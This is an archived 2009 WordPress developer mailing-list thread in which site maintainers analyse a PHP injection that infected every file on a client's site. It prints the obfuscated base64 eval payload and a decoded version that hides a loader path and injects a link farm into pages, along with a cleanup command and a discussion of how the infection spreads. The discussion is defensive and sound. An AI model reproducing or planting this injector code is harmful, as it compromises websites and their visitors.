[wp-hackers] Weird PHP Injection

Chris Jean gaarai at gaarai.com
Thu Oct 29 20:01:50 UTC 2009 

I've seen this a lot lately. It's actually not just limited to WordPress
since I've seen it in PHP-based forum software as well. While the code
may not be exactly the same, it is similar enough to tell me that it is
either the same family of code or a derivative.

In the forum case, an bug was exploited that allowed the attacker to
load PHP code through an uploaded image that didn't filter against PHP
files being uploaded. This initial PHP code goes through all the PHP
files it can find on the site and adds the code similar to what you have
below to them.

As seen in your partial decode, the code in each of the files calls the
origin code each time to ensure that all new or cleaned up PHP files are
remodified, thus making it hard to remove unless you find that origin
file and remove it first.

I've yet to determine exactly how WordPress sites pick this up, but I
wouldn't be surprised if it isn't through a similar process of being
able to upload a PHP file to the server through a bugged piece of code.
It is possible that a different method is used and that it is through
compromised FTP, SSH, etc credentials or through shared hosting with
poor security that doesn't prevent the spread of files between different
hosting accounts.

Every time I've seen code like this, it does nothing more than inject a
hidden link farm into the content of the site. So, it's destructive to
the search engine rankings of the exploited site, but I have yet to see
it attempt to be anything more dangerous than that.

Chris Jean
http://gaarai.com/
@chrisjean



Lew Ayotte - Full Throttle Development wrote:
> I'm not sure if anyone has seen this before... except for this guy:
> http://wordpress.org/support/topic/320918?replies=8
>
> But I just ran into an issue with a client using WP2.8.4. It seems like
> every single file in WP (including themes and plugins) had this injected at
> the top:
>
> <?
> /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy9odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy93cC1waHBteWFkbWluL3BocG15YWRtaW4vcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL3Zhci93d3cvaHRtbC93cC1jb250ZW50L3BsdWdpbnMvd3AtcGhwbXlhZG1pbi9waHBteWFkbWluL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMz
>  RGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM
>  9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19'));
> ?>
>
>
> Which I decoded and prettied up for everyone:
>
> if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
>     $GLOBALS['sh_no'] = 1;
>
> if(file_exists('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php'))
> {
>
> include_once('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php');
>
>         if(function_exists('gml')&&!function_exists('dgobh')) {
>
>             if(!function_exists('gzdecode')) {
>
>                 function gzdecode($R20FD65E9C7406034FADC682F06732868) {
>
>                     $R6B6E98CDE8B33087A33E4D3A497BD86B =
> ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
>                     $R60169CD1C47B7A7A85AB44F884635E41 = 10;
>                     $R0D54236DA20594EC13FC81B209733931 = 0;
>
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) {
>                         $R0D54236DA20594EC13FC81B209733931 =
> unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
>                         $R0D54236DA20594EC13FC81B209733931 =
> $R0D54236DA20594EC13FC81B209733931[1];
>                         $R60169CD1C47B7A7A85AB44F884635E41+ =
> 2+$R0D54236DA20594EC13FC81B209733931;
>                     }
>
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) {
>                         $R60169CD1C47B7A7A85AB44F884635E41 =
> strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
>                     }
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) {
>                         $R60169CD1C47B7A7A85AB44F884635E41 =
> strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
>                     }
>                     if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) {
>                         $R60169CD1C47B7A7A85AB44F884635E41+ = 2;
>                     }
>                         $RC4A5B5E310ED4C323E04D72AFAE39F53 =
> gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
>
>                     if($RC4A5B5E310ED4C323E04D72AFAE39F53 =  =  = FALSE) {
>                         $RC4A5B5E310ED4C323E04D72AFAE39F53 =
> $R20FD65E9C7406034FADC682F06732868;
>                     }
>
>                     return $RC4A5B5E310ED4C323E04D72AFAE39F53;
>                 }
>             }
>
>             function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
>
>                 Header('Content-Encoding: none');
>                 $R3E33E017CD76B9B7E6C7364FB91E2E90 =
> gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
>
>
> if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
>                     return
> preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
>                 } else {
>                     return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
>                 }
>             }
>
>             ob_start('dgobh');
>         }
>     }
> }
>
> I have no idea what it does and I'm not sure if the WP-phpMyAdmin plugin had
> a security hole or why it's part of this code. But I deactivated it on the
> client's site.
>
> To clean it up:
> I first tried just upgrading him to WP2.8.5, but as soon as I visited the
> site, it re-injected all the files with that crap. So I ran this script to
> remove it from all files:
>
> find . -name '*.php' | xargs perl -pi -e "s#\<\?
> /\*\*/eval\(base64_decode\('.+'\)\); \?\>##g"
>
> Then, for good measure I re-copied all the WP2.8.5 files back over. It seems
> to have fixed it for the client.
>
> Also, for what it's worth, these are all the plugins that he had
> activated...
>
>     AddThis Social Bookmarking Widget
>     Advanced Excerpt
>     Akismet
>     Dagon Design Form Mailer
>     Event Calendar
>     Lightbox 2
>     NextGEN Gallery
>     Search & Replace
>     SEO Title Tag
>     Similarity
>     SimplePie Core
>     SimplePie Plugin for WordPress
>     Theme Switcher
>     Twitter Tools
>     Viper's Video Quicktags
>     WP-phpMyAdmin
>     wp-Table
>     WP-Table Reloaded
>     WPtouch iPhone Theme
>
> I'm still digging to see if I can figure out where the actual hole was. Any
> ideas?
>
> Lew Ayotte
> Full Throttle Development, LLC
> 706.363.0688
> 478.246.4627
> lew at fullthrottledevelopment.com
> http://fullthrottledevelopment.com
> http://twitter.com/full_throttle
> http://twitter.com/lewayotte
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

More information about the wp-hackers mailing list